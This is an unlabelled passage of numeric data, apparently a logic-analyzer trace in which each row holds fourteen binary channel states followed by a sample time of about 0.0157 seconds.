1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699252e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699276e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699300e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699328e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699352e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699428e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699452e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699476e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699484e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5699528e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699556e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5699560e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699628e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699652e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699676e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699700e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699708e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5699756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699828e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699832e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5699876e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699908e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700104e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700128e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5700132e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5700180e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5700204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700252e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700276e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700300e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700328e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700352e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5700380e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5700404e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5700428e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5700452e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5700476e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700528e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700652e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700676e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700700e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700728e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700752e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700780e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700828e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700852e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700876e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700900e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700928e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5700952e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5700980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701028e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701052e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701076e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5701084e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5701128e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5701156e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5701160e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701204e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701252e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701276e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701300e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701328e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701352e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5701356e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5701404e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5701428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701436e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701452e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701476e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701500e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701528e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701628e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5701632e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5701676e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5701704e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701728e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701752e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701804e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701828e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701852e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701876e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701900e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701928e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5701952e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5701980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702004e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702008e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5702052e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702076e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702104e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702128e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702152e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702228e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702232e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5702276e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702304e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702328e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702352e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702452e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702476e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702500e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702508e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5702556e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702580e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5702584e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702588e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702628e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,1.5702632e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702636e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5702676e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702704e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5702728e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702752e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5702780e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5702804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702852e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702876e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702928e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5702952e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5702980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703028e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703052e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703076e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703100e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703128e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703228e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703252e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703276e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5703284e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5703328e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5703356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703360e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703404e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5703408e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5703452e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5703476e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703504e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703528e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703552e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703652e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703676e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5703684e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5703728e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5703756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703760e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703804e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703828e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703852e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703876e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703900e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703928e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5703952e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5703980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704004e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704076e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704100e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704128e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704152e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704204e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704252e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704276e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704300e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704328e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704352e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704452e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704476e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704500e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704524e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704548e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5704576e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5704600e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5828960e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.5829144e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.5829148e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829164e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,1.5829196e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829220e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5829516e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5829564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5829616e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829640e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5829668e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829692e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5829716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5829740e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,1,1.5829744e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,1.5829748e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,1,1.5829788e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5829796e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5829816e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5829820e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5829824e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5829840e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5829868e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5829916e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5829940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5829964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5829988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830016e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830040e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830068e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830092e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830140e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5830144e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5830148e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5830192e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5830216e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5830220e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830224e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830240e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830264e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5830268e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5830316e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5830340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830348e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830516e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830664e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830864e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5830888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5830916e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5830940e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5830944e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5830988e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831020e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831064e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831116e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831264e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831316e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831464e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831468e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5831516e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831548e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831640e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831664e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831692e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5831740e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831772e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5831788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5831812e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831820e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5831836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831864e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5831888e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831916e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5831940e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5831964e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5831988e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832012e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5832064e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832088e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5832116e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832140e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5832144e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832148e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832264e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832316e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832368e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5832388e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832412e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5832436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832468e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832516e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832588e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832664e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832688e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832864e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5832888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5832916e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5832940e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5832988e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833020e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833064e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833244e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5833288e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833316e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5833320e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833324e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833464e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833512e-02 